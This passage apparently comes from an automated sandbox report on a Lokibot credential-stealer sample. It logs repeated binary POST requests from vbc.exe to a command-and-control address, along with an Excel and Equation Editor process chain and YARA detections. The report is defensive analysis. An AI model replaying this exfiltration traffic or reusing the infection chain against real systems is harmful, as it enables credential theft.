                            Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.224916963.141.228.14180C:\Users\Public\vbc.exe
                            TimestampkBytes transferredDirectionData
                            Jun 16, 2021 12:29:48.840133905 CEST819OUTPOST /32.php/S4wFP8QBww9Tp HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.141.228.141
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: B78A3212
                            Content-Length: 176
                            Connection: close
                            Jun 16, 2021 12:29:49.679653883 CEST820INHTTP/1.1 404 Not Found
                            Date: Wed, 16 Jun 2021 10:29:48 GMT
                            Server: Apache
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.224917063.141.228.14180C:\Users\Public\vbc.exe
                            TimestampkBytes transferredDirectionData
                            Jun 16, 2021 12:29:49.987019062 CEST830OUTPOST /32.php/S4wFP8QBww9Tp HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.141.228.141
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: B78A3212
                            Content-Length: 149
                            Connection: close
                            Jun 16, 2021 12:29:50.833703995 CEST832INHTTP/1.1 404 Not Found
                            Date: Wed, 16 Jun 2021 10:29:50 GMT
                            Server: Apache
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.224917163.141.228.14180C:\Users\Public\vbc.exe
                            TimestampkBytes transferredDirectionData
                            Jun 16, 2021 12:29:51.153026104 CEST842OUTPOST /32.php/S4wFP8QBww9Tp HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.141.228.141
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: B78A3212
                            Content-Length: 149
                            Connection: close
                            Jun 16, 2021 12:29:51.991955042 CEST844INHTTP/1.1 404 Not Found
                            Date: Wed, 16 Jun 2021 10:29:51 GMT
                            Server: Apache
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: EXCEL.EXE PID: 2520 Parent PID: 584

                            General

                            Start time:12:28:49
                            Start date:16/06/2021
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase:0x13f210000
                            File size:27641504 bytes
                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: EQNEDT32.EXE PID: 2724 Parent PID: 584

                            General

                            Start time:12:29:11
                            Start date:16/06/2021
                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            Wow64 process (32bit):true
                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                            Imagebase:0x400000
                            File size:543304 bytes
                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: vbc.exe PID: 2856 Parent PID: 2724

                            General

                            Start time:12:29:15
                            Start date:16/06/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xd00000
                            File size:761856 bytes
                            MD5 hash:7146B0D2CAED6422C289A08F63A5C685
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security
